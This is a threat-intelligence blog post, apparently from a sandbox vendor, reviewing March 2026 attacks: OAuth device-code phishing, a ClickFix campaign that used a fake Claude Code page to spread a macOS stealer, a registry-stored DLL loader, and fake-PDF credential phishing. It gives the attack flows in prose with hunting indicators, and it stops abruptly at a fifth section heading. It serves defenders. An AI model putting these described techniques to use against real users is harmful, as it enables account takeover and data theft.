{"id":19709,"date":"2026-04-01T12:08:31","date_gmt":"2026-04-01T12:08:31","guid":{"rendered":"\/cybersecurity-blog\/?p=19709"},"modified":"2026-04-03T13:10:40","modified_gmt":"2026-04-03T13:10:40","slug":"major-cyber-attacks-march-2026","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/","title":{"rendered":"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0"},"content":{"rendered":"\n<p>March 2026 brought a wave of cyber attacks that reflected how quickly modern threats can move from subtle early signals to serious business impact. <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a> analysts identified and explored several major threats this month, exposing phishing campaigns, stealthy malware, payment-skimming activity, and resilient botnet infrastructure affecting organizations across industries.<\/p>\n\n\n\n<p>From Microsoft 365 token abuse and registry-hidden RAT delivery to card theft, macOS backdoor activity, and multi-vector DDoS operations, the threat landscape in March showed how much harder early detection has become for security teams.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key Business Risks That Stood Out in March Attacks&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Trusted services and normal-looking workflows were repeatedly used to hide malicious activity, increasing the risk of delayed detection across enterprise email, cloud, payment, and endpoint environments.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Attacks&nbsp;observed&nbsp;in March affected industries including&nbsp;<strong>government,&nbsp;<\/strong><a href=\"https:\/\/any.run\/by-industry\/finance\/\" target=\"_blank\" rel=\"noreferrer 
noopener\"><strong>finance<\/strong><\/a><strong>, healthcare, technology, education, manufacturing, and energy<\/strong>, with risks extending beyond&nbsp;initial&nbsp;access into&nbsp;token abuse, remote access, card theft, and broader malware deployment.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Stealthy, multi-stage delivery methods made early&nbsp;signals weaker and investigations slower, raising the likelihood of escalation before security teams could confirm malicious behavior.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>For organizations, the business impact was not limited to infection alone, but included&nbsp;<strong>fraud, downtime, deeper compromise, and higher operational costs tied to delayed response<\/strong>.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">1.&nbsp;EvilTokens: OAuth Device Code Phishing Enables M365 Account Takeover Without Credential Theft&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7434937055455055872\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/oauth-device-code-phishing\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check detailed breakdown<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;observed&nbsp;a sharp rise in&nbsp;<strong>EvilTokens<\/strong>, a phishing campaign abusing Microsoft\u2019s OAuth Device Code flow, with more than&nbsp;<strong>180 phishing URLs detected in just one week<\/strong>. 
Instead of stealing credentials on a fake login page, attackers trick victims into entering a verification code on&nbsp;<strong>microsoft[.]com\/devicelogin<\/strong>, which causes Microsoft to issue OAuth tokens directly to the attacker.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-768x1024.jpeg\" alt=\"\" class=\"wp-image-19722\" style=\"width:408px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-768x1024.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-225x300.jpeg 225w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-1152x1536.jpeg 1152w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-1536x2048.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-370x493.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-270x360.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-740x987.jpeg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-scaled.jpeg 1920w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><figcaption class=\"wp-element-caption\"><em>Execution chain of&nbsp;EvilTokens<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This makes&nbsp;EvilTokens&nbsp;especially dangerous for organizations relying on traditional phishing detection. The user&nbsp;signs in through a legitimate Microsoft page, completes MFA, and never&nbsp;submits&nbsp;credentials to the phishing site. 
As a result, the compromise shifts from&nbsp;<strong>password theft to token abuse<\/strong>, giving attackers access to Microsoft 365 resources while blending into normal authentication activity.&nbsp;<\/p>\n\n\n\n<p>Because the workflow runs over encrypted HTTPS and uses legitimate Microsoft infrastructure, key attack&nbsp;signals are often hidden from security teams. That delays validation, extends investigations, and increases the chance of escalation before analysts can confirm what happened.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/885afc1c-b616-46d7-9bc3-81185ee07fe3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See full attack flow exposed in ANY.RUN Sandbox<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"657\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-1024x657.png\" alt=\"Fake verification granting access to external client\" class=\"wp-image-19723\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-1024x657.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-300x192.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-768x493.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-370x237.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-270x173.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-740x475.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3.png 1384w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake verification granting access to external 
client<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox, automatic&nbsp;<strong>SSL decryption<\/strong>&nbsp;revealed the hidden JavaScript and backend communication used to orchestrate the phishing flow. In this case, analysts uncovered high-confidence network indicators such as:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\/api\/device\/start&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\/api\/device\/status\/*&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>X-Antibot-Token&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>When seen in HTTP requests to non-legitimate hosts, these artifacts become strong hunting&nbsp;signals for&nbsp;identifying&nbsp;related phishing infrastructure and improving detection coverage.&nbsp;<\/p>\n\n\n\n<p>To investigate similar activity and&nbsp;validate&nbsp;detection logic, use this&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#%7B%22query%22:%22threatName:%5C%22oauth-ms-phish%5C%22%22,%22dateRange%22:7%7D\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;oauth-ms-phish&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"700\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-1024x700.png\" alt=\"\" class=\"wp-image-19724\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-1024x700.png 1024w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-300x205.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-768x525.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-370x253.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-270x185.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-740x506.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb.png 1159w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Targeted industries and countries displayed in TI&nbsp;Lookup<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>TI Lookup helps teams quickly assess the broader attack landscape around EvilTokens and related OAuth phishing activity. Recent submissions show notable targeting across <strong>Technology, Education, Manufacturing, and Government &amp; Administration<\/strong>, especially in the United States and India, while other regions are also affected.<\/p>\n\n\n\n<p>This gives SOC teams access to related sandbox analyses, IOCs, and behavioral patterns they can use to strengthen detections and hunting. For CISOs, that means earlier visibility into relevant campaigns, better prioritization of response efforts, and a stronger ability to reduce the business impact of Microsoft 365 account takeover.&nbsp;<\/p>\n\n\n\n<p>IOCs related to this attack:&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">2.&nbsp;macOS&nbsp;ClickFix&nbsp;Campaign Targets Claude Code Users with AMOS Stealer and Backdoor Access&nbsp;<\/h2>\n\n\n\n<p><a 
href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7442565604059828224\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;identified&nbsp;a&nbsp;<strong>macOS-specific&nbsp;ClickFix&nbsp;campaign<\/strong>&nbsp;targeting users of AI tools such as&nbsp;Claude Code, Grok, n8n,&nbsp;NotebookLM, Gemini CLI,&nbsp;OpenClaw, and Cursor. In the observed case, attackers used a redirect from&nbsp;Google Ads&nbsp;to a fake Claude Code documentation page, where a&nbsp;ClickFix&nbsp;flow pushed the victim to run a terminal command that&nbsp;ultimately delivered&nbsp;<strong>AMOS Stealer<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"570\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-1024x570.png\" alt=\"Fake Claude Code documentation page used as a lure\" class=\"wp-image-19725\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-1024x570.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-300x167.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-768x428.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-1536x855.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-2048x1141.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-370x206.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-270x150.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-740x412.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake Claude Code documentation page used as a lure<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Once executed, the infection chain moved beyond credential theft. The malware collected browser data, saved credentials, Keychain contents, and sensitive files, then deployed a backdoor that provided continued access to the infected Mac. This makes the attack more serious than a one-time stealer infection, especially in enterprise environments where&nbsp;macOS&nbsp;systems often hold developer access, internal documentation, and business-critical credentials.&nbsp;<\/p>\n\n\n\n<p>How the attack unfolds:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Google Ads redirect sends the victim to a fake Claude Code documentation page&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>ClickFix&nbsp;lures the user into running a terminal command&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The command downloads and executes an encoded script&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>AMOS Stealer<\/strong>&nbsp;collects browser data, saved credentials, Keychain contents, and sensitive files&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A backdoor is deployed for continued access&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The updated&nbsp;~\/.mainhelper&nbsp;module enables an interactive reverse shell over WebSocket with PTY support&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"621\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-1024x621.png\" alt=\"AMOS Stealer detected by ANY.RUN\u00a0\" 
class=\"wp-image-19726\" style=\"width:560px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-1024x621.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-768x465.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-370x224.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-740x448.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00.png 1188w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>AMOS Stealer detected by ANY.RUN<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>A key finding in this case was the evolution of the backdoor module&nbsp;<strong>~\/.mainhelper<\/strong>. Previously described as a more limited implant, the updated variant now supports a fully interactive reverse shell, giving attackers persistent, hands-on access to the infected system in real time.&nbsp;<\/p>\n\n\n\n<p>For defenders, that changes the risk&nbsp;significantly. What starts as a phishing-style&nbsp;ClickFix&nbsp;infection can quickly turn into long-term remote access, data theft, and broader compromise. 
Multi-stage delivery, obfuscated scripts, and abuse of legitimate&nbsp;macOS&nbsp;components also break visibility into weaker&nbsp;signals, which can slow validation and delay escalation.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/74f5000d-aa91-4745-9fc7-fdd95549874b\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>See the full&nbsp;macOS&nbsp;ClickFix campaign execution chain<\/strong><\/a><strong><\/strong>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-768x1024.jpeg\" alt=\"macOS\u00a0ClickFix\u00a0campaign details discovered by ANY.RUN\" class=\"wp-image-19727\" style=\"width:514px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-768x1024.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-225x300.jpeg 225w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-1152x1536.jpeg 1152w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-1536x2048.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-370x493.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-270x360.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-740x987.jpeg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-scaled.jpeg 1920w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><figcaption class=\"wp-element-caption\"><em>macOS&nbsp;ClickFix&nbsp;campaign details discovered by 
ANY.RUN<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>ANY.RUN Sandbox helps teams investigate&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/anyrun-macos-sandbox\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>macOS<\/strong><\/a><strong>, Windows, Linux, and Android<\/strong>&nbsp;threats with visibility into execution flow, attacker&nbsp;behavior, persistence mechanisms, and dropped artifacts. In cases like this, cross-platform threat analysis helps analysts confirm malicious activity faster, attribute the intrusion with greater confidence, and strengthen detection logic before the compromise expands further.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3. RUTSSTAGER: Registry-Stored DLL Leads to&nbsp;OrcusRAT&nbsp;Deployment&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7435323496978882560\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts detected&nbsp;<strong>RUTSSTAGER<\/strong>, a stealthy malware stager that hides a DLL inside the Windows registry in hexadecimal form, making the payload harder to spot during early triage. In the observed chain, the stager led to the deployment of&nbsp;<strong>OrcusRAT<\/strong>, followed by an&nbsp;additional&nbsp;binary that helped&nbsp;maintain&nbsp;persistence, ran PowerShell-based system checks, and relaunched the RAT when needed.&nbsp;<\/p>\n\n\n\n<p>What makes this threat notable is the way it avoids a straightforward on-disk delivery path. By storing the DLL in the registry instead of dropping it as a conventional file, the malware reduces its visibility and gives defenders fewer obvious artifacts to catch at first glance. 
The follow-on activity then helps stabilize the infection and keep remote access available on the compromised system.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/b357aa61-29d5-4c7f-87f8-359281319a72\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Review the full execution chain<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-1024x1024.jpeg\" alt=\"RUTSSTAGER attack details revealed inside ANY.RUN sandbox\" class=\"wp-image-19728\" style=\"width:524px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-1024x1024.jpeg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-300x300.jpeg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-150x150.jpeg 150w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-768x768.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-1536x1536.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-2048x2048.jpeg 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-70x70.jpeg 70w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-370x370.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-270x270.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-740x740.jpeg 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption 
class=\"wp-element-caption\"><em>RUTSSTAGER attack details revealed inside ANY.RUN sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox,&nbsp;behavioral&nbsp;analysis exposed how the infection unfolded across stages, while file system and process monitoring helped reveal the relationship between the stager, the deployed RAT, and the persistence&nbsp;component. Process synchronization events were especially useful here, showing that the payload components were not acting independently but as part of a coordinated, multi-stage execution chain.&nbsp;<\/p>\n\n\n\n<p>To explore related activity, review relevant sandbox analyses and assess the broader threat landscape, use the following&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#%7B%2522query%2522:%2522registryName:%255C%2522%5Erutsdll32$%255C%2522%2522,%2522dateRange%2522:180%7D\" target=\"_blank\" rel=\"noreferrer noopener\">registryName:&#8221;^rutsdll32$&#8221;<\/a>&nbsp;<\/p>\n\n\n\n<p><strong>Gathered IOCs:<\/strong>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">4. 
Fake PDF Attachments Hide HTML Phishing Pages That Steal Credentials&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7437492983123529728\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;identified&nbsp;phishing emails carrying&nbsp;<strong>HTM\/HTML attachments disguised as PDF files<\/strong>. In the observed case, a file named&nbsp;<strong>pdf.htm<\/strong>&nbsp;opened a fake login page and sent&nbsp;submitted&nbsp;credentials in JSON format through an HTTP POST request to the&nbsp;<strong>Telegram Bot API<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-768x1024.jpeg\" alt=\"Attack details discovered by ANY.RUN\" class=\"wp-image-19730\" style=\"width:520px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-768x1024.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-225x300.jpeg 225w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-1152x1536.jpeg 1152w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-1536x2048.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-370x493.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-270x360.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-740x987.jpeg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-scaled.jpeg 1920w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><figcaption class=\"wp-element-caption\"><em>Attack details discovered by 
ANY.RUN<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>The attack relies on a simple but effective disguise: the attachment looks like a document but actually launches a phishing page designed to collect login data. Some samples also include obfuscated scripts, which makes the credential theft logic less obvious during manual inspection and slows down triage.<\/p>\n\n\n\n<p>Once a victim enters their credentials, attackers can use them to access business email, internal services, and other corporate systems tied to the compromised account. For security teams, this turns what may&nbsp;look&nbsp;like a routine attachment into a fast-moving account takeover risk.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/3a6af151-cf57-461f-b600-19c39fdfcce6?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See the analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"222\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-1024x222.png\" alt=\"Less than 1 minute\u00a0required\u00a0to reveal the phishing\u00a0behavior\u00a0inside ANY.RUN sandbox\" class=\"wp-image-19731\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-1024x222.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-300x65.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-768x166.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-370x80.png 370w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-270x58.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-740x160.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49.png 1192w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Less than 1 minute&nbsp;required&nbsp;to reveal the phishing&nbsp;behavior&nbsp;inside ANY.RUN sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox, the phishing&nbsp;behavior&nbsp;became visible in under 60 seconds, exposing the outbound communication, loaded scripts, and file contents involved in the theft flow. This helps teams quickly confirm whether an attachment is just suspicious or part of an active credential-harvesting attack, reducing review time and helping analysts act before the stolen access is used.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">5. SVG Smuggling Campaign Targets Colombian Organizations&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7441841298115989505\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on 